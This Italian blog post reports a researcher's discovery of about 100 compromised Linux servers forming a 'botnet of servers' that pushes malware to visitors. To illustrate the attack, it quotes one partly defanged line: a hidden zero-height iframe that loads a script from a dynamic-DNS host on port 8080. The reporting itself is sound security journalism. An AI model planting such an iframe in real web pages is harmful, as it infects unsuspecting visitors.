Secondo un ricercatore russo esisterebbe un buon numero di server Linux infetti da malware, tanto che è arrivato a parlare di “botnet di server”, che distribuiscono malware agli ignari visitatori.
-
La sicurezza totale è un mito, anche con Linux
I server, come ci si aspetta, ospitano siti legittimi, ma anche il web server nginx, una sorta d’infezione che contagia il computer del visitatore.
Una rete di pc zombie potenziata, composta di utenti e server, quindi. Una cosa che, secondo Denis Sinegubko, si attendeva da tempo.
Il server fantasma usa la porta 8080 per trasmettere il codice maligno ai computer degli utenti, sfruttando servizi DNS, come DynDNS.com, per il trasferimento anonimo. Il codice dovrebbe essere simile a quello qui sotto:
<i_frame src=”http ://a86x . homeunix . org:8080/ts/in.cgi?open2″ width=997 height=0 style=”visibility: hidden”></iframe>
Una rete composta da server e client è, evidentemente, più stabile, efficace ed efficiente, qualsiasi sia lo scopo che serva. Se si tratta di sottrarre dati personali, perpetrare attacchi DDoS, oppure gestire applicazioni online o social network i risultati non cambiano.
La colpa maggiore, forse, è degli amministratori che non hanno scelto password abbastanza sicure, che è stato possibile violare in qualche modo.
Per Sinegubko le piccole dimensioni della rete (circa 100 server) indica che si tratta, probabilmente, di una dimostrazione tecnica, eseguita su server Apache con diverse distribuzioni di Linux. Ma, ammette, può anche darsi che la rete sia più grande, e lui ne abbia individuato solo una parte. È anche vero, però, che The Register ha pubblicato, in passato, più di una notizia esagerata o falsata, quindi è da prendere tutto con le molle.
Ovviamente questa situazione non dimostra che Linux è più o meno sicuro degli altri sistemi operativi, ma solo che, come accade per il binomio Windows/client, è il bersaglio migliore se si vogliono colpire i server, perché è il sistema operativo più diffuso.
Il problema, semmai, è un altro: se i server che usiamo quotidianamente cominciano a diffondere software pericoloso, come difendersi, se nemmeno chi li gestisce e riuscito a fermare l’attacco?
Post Correlati
Microsoft regala 20.000 righe di codice a Linux Ogni tanto il mondo va alla rovescia, come quando Microsoft molla 20.000 righe di codice a Linux. A quanto pare servire a migliorare la collaborazione ...
Il mondo intero dipende da Linux server, telefoni, client, GPS, elettronica di consumo.... ci avevate mai pensato? Senza il pinguino saremmo rovinati
http://blogs.zdnet.com/open-source/?p=4897 La lenta, esasperante marcia del Pinguino Linux Anche se non sembra, per chi non è vicino al mondo della tecnologia, Linux cresce a ritmi più che rispettabili: ad oggi ...
Google Vs China, una matassa difficile da sbrogliare. 1. Introduzione
Tutti, o quasi, hanno sentito parlare dello scontro tra Google e il governo cinese, nato dagli esiti della chiamata "Operazione Aurora", che ha portato ...
Antipirateria alla francese: sotto tiro anche le reti wireless e relativi proprietari La legge HADOPI, conosciuta come "legge dei tre colpi" ha un corollario imbarazzante. I legislatori stanno cercando di far passare un principio secondo il quale ...
100 ragioni per comprare uno smartphone: fare la spesa senza stress! Andare a fare la spesa per alcuni è una noiosa incombenza, e per altri un trauma da recuperare in un paio di giorni. Almeno nelle ...
Pingback: Technotizie.it